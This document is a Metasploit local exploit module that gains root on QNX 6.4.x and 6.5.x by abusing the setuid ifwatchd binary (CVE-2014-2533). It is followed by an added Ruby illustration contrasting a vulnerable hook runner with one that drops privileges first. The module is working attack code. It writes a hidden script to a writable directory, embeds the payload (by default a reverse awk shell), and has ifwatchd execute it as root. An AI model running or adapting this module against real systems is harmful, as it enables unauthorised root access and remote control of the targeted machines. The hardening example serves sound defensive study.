ifwatchd Privilege Escalation
Source: metasploit.com  Author: Coles  Published: 2018-10-09
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ifwatchd Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
        systems by exploiting the ifwatchd suid executable.

        ifwatchd allows users to specify scripts to execute using the '-A'
        command line argument; however, it does not drop privileges when
        executing user-supplied scripts, resulting in execution of arbitrary
        commands as root.

        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
        and 6.5.0 SP1 (x86).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'cenobyte',     # Discovery and exploit
          'Tim Brown',    # Independent discovery
          'Brendan Coles' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2014-2533'],
          ['BID', '66449'],
          ['EDB', '32153'],
          ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
        ],
      'DisclosureDate' => 'Mar 10 2014',
      'Platform'       => 'unix', # QNX
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => %w(shell meterpreter),
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars'    => '',
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'gawk generic'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'PAYLOAD'  => 'cmd/unix/reverse_awk'
        }
    ))
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def ifwatchd_path
    '/sbin/ifwatchd'
  end

  def base_dir
    datastore['WritableDir']
  end

  def check
    unless setuid? ifwatchd_path
      vprint_error "#{ifwatchd_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ifwatchd_path} is setuid"

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"

    print_status 'Writing interface arrival event script...'
    cmd_exec "echo '#!/bin/sh' > #{script_path}"
    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
    # Escape double quotes and dollar signs so the payload survives the
    # double-quoted echo below without being expanded by the shell.
    exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
    cmd_exec "echo \"#{exp}\" >> #{script_path}"
    cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
    register_file_for_cleanup script_path
    cmd_exec "chmod +x '#{script_path}'"

    print_status "Executing #{ifwatchd_path}..."
    interface = 'lo0'
    cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
  end
end
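The defect the module relies on is that a setuid-root helper runs a caller-supplied script without first dropping back to the caller's real uid and gid. The following Ruby is an added illustration, not part of the Metasploit module or of ifwatchd itself: a minimal "hook runner" in its vulnerable form next to a hardened form that permanently drops privileges in a forked child, verifies the drop took effect, and only then execs the hook, plus the kind of setuid-bit check the module's check method performs. It assumes a POSIX system with /bin/sh and id available; the demo hook script it writes is constructed for the example.

```ruby
require 'tempfile'
require 'open3'

# Constructed demo hook: prints the uid it is actually running as.
def write_demo_hook
  f = Tempfile.create(['hook', '.sh'])
  f.write("#!/bin/sh\nid -u\n")
  f.close
  f.path
end

# The check the module's 'check' method depends on: is the file
# setuid and owned by root? Missing or unreadable paths are not setuid.
def setuid_root?(path)
  st = File.stat(path)
  st.setuid? && st.uid.zero?
rescue Errno::ENOENT, Errno::EACCES
  false
end

# Vulnerable pattern: run the hook with whatever privileges the helper
# currently holds. In a setuid-root binary that is euid 0, which is
# exactly how an attacker-supplied '-A' script ends up running as root.
def run_hook_unsafe(script_path)
  out, _status = Open3.capture2('/bin/sh', script_path)
  out
end

# Hardened pattern: fork, permanently drop to the real uid/gid in the
# child, refuse to continue if the drop did not take, then exec the hook.
def run_hook_dropped(script_path)
  reader, writer = IO.pipe
  pid = fork do
    reader.close
    real_uid = Process.uid
    real_gid = Process.gid
    begin
      # Group first: once the uid is unprivileged, setgid would fail.
      Process::GID.change_privilege(real_gid)
      Process::UID.change_privilege(real_uid)
    rescue SystemCallError
      exit!(111)
    end
    # Never run the hook if we are still more privileged than the caller.
    exit!(111) unless Process.euid == real_uid && Process.egid == real_gid
    $stdout.reopen(writer)
    exec('/bin/sh', script_path)
  end
  writer.close
  out = reader.read
  reader.close
  Process.wait(pid)
  raise 'privilege drop failed; hook not executed' if $?.exitstatus == 111
  out
end

if __FILE__ == $PROGRAM_NAME
  hook = write_demo_hook
  puts "setuid root? #{setuid_root?(hook)}"
  puts "hook ran as uid #{run_hook_dropped(hook).strip} (caller is #{Process.uid})"
  File.delete(hook)
end
```

Run as an ordinary user both runners report the same uid, because there is nothing to drop; the difference only matters when the helper is setuid root, which is precisely the case the ifwatchd advisory describes. The change_privilege calls are the permanent (setresuid-style) drop, not the temporary seteuid one, so the hook cannot regain root even if it tries.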